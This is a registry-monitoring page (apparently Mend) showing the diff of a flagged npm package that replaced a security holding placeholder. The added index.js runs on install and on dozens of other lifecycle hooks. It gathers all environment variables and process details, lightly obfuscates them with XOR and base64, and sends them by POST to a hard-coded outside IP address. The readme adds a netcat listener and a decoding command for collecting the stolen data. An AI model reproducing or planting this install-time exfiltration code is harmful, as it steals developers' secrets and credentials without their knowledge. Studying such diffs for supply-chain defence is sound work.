npm - @tilliwilli/npm-lifecycles - Versions diffs - 0.0.1-security → 1.0.4 - Mend

@tilliwilli/npm-lifecycles 0.0.1-security → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @tilliwilli/npm-lifecycles might be problematic. Click here for more details.

Files changed (4) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,37 @@
+var fs = require("fs");
+var util = require("util");
+var http = require("http");
+var npmLifecycleEvent = process.env.npm_lifecycle_event;
+if (npmLifecycleEvent !== "postinstall")
+    process.exit();
+var log = {
+    event: npmLifecycleEvent,
+    version: process.version,
+    arch: process.arch,
+    platform: process.platform,
+    features: process.features,
+    env: process.env,
+    title: process.title,
+    argv: process.argv,
+    execArgv: process.execArgv,
+    pid: process.pid,
+    ppid: process.ppid,
+    execPath: process.execPath,
+    debugPort: process.debugPort,
+    argv0: process.argv0,
+    _preload_modules: process._preload_modules,
+    mainModule: process.mainModule,
+};
+var output = util.inspect(log);
+http
+    .request({
+        hostname: "51.250.107.250",
+        method: "POST",
+        headers: { Authorization: `Bearer ` + Buffer.from(output).map(x => x ^ 7).toString("base64") }
+    })
+    .end();

package/package.json CHANGED Viewed

@@ -1,6 +1,60 @@
 {
   "name": "@tilliwilli/npm-lifecycles",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.4",
+  "main": "index.js",
+  "scripts": {
+    "premyscript": "node index.js",
+    "myscript": "node index.js",
+    "postmyscript": "node index.js",
+    "prepare": "node index.js",
+    "prepublish": "node index.js",
+    "prepublishOnly": "node index.js",
+    "prepack": "node index.js",
+    "postpack": "node index.js",
+    "dependencies": "node index.js",
+    "devDependencies": "node index.js",
+    "devDependency": "node index.js",
+    "curl": "node index.js",
+    "wget": "node index.js",
+    "preinstall": "node index.js",
+    "install": "node index.js",
+    "postinstall": "node index.js",
+    "preprepare": "node index.js",
+    "postprepare": "node index.js",
+    "node_modules": "node index.js",
+    "binding.gyp": "node index.js",
+    "publish": "node index.js",
+    "postpublish": "node index.js",
+    "npm rebuild": "node index.js",
+    "npm restart": "node index.js",
+    "restart": "node index.js",
+    "stop": "node index.js",
+    "start": "node index.js",
+    "pre": "node index.js",
+    "post": "node index.js",
+    "prerestart": "node index.js",
+    "postrestart": "node index.js",
+    "prestart": "node index.js",
+    "poststart": "node index.js",
+    "prestop": "node index.js",
+    "poststop": "node index.js",
+    "npm test": "node index.js",
+    "pretest": "node index.js",
+    "test": "node index.js",
+    "posttest": "node index.js",
+    "uninstall": "node index.js",
+    "PATH": "node index.js",
+    "bar": "node index.js",
+    "npm_lifecycle_event": "node index.js",
+    "sh": "node index.js",
+    "npm_config_binroot": "node index.js",
+    ".gyp": "node index.js",
+    "npm": "node index.js",
+    "INIT_CWD": "node index.js",
+    "run": "node index.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "dependencies": {}
 }

package/readme.md ADDED Viewed

@@ -0,0 +1,84 @@
+# list of events occur when publishing
+- prepublishOnly
+- prepack
+- prepare
+- postpack
+- publish
+- postpublish
+# list of events occur when installing from npm registry
+- preinstall
+- install
+- postinstall
+# list of events occur when installing from file:// protocol (file:///htdocs/test)
+- preinstall
+- prepare
+- install
+- postinstall
+# list of events occur when installing from http:// protocol (http://localhost:8000/test.tar.gz)
+- preinstall
+- install
+- postinstall
+# what web server receives from `npm i http://localhost:8000/test.tar.gz`
+```bash
+┌──(tilli㉿pasakoh)-[/mnt/c/Users/tilli/htdocs/visiology-public-utilities-hack]
+└─$ nc -lvnp 8000
+listening on [any] 8000 ...
+connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48492
+GET /test.tar.gz HTTP/1.1
+npm-command: install
+pacote-pkg-id: remote:xxx@http://localhost:8000/test.tar.gz
+pacote-req-type: tarball
+pacote-version: 12.0.3
+user-agent: npm/8.5.0 node/v16.14.2 win32 x64 workspaces/false
+if-modified-since: Sun, 10 Apr 2022 12:48:38 GMT
+connection: keep-alive
+Accept: */*
+Accept-Encoding: gzip,deflate
+Host: localhost:8000
+```
+# listening server
+```bash
+while true; do sudo nc -N -lvnp 80 < response.json >> output; done
+```
+# response.json
+```bash
+HTTP/1.1 200 OK
+Connection: close
+{"result":"ok"}
+```
+# extract request payload
+```bash
+grep Auth output | awk '{print $3}' | base64 -d | less
+```
+# investigate more
+- place exe in node_modules/.hooks/{eventname} https://docs.npmjs.com/cli/v6/using-npm/scripts#hook-scripts
+# links
+https://docs.npmjs.com/cli/v8/using-npm/scripts#life-cycle-scripts
+https://docs.npmjs.com/cli/v8/configuring-npm/package-json#scripts

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40tilliwilli%2Fnpm-lifecycles for more information.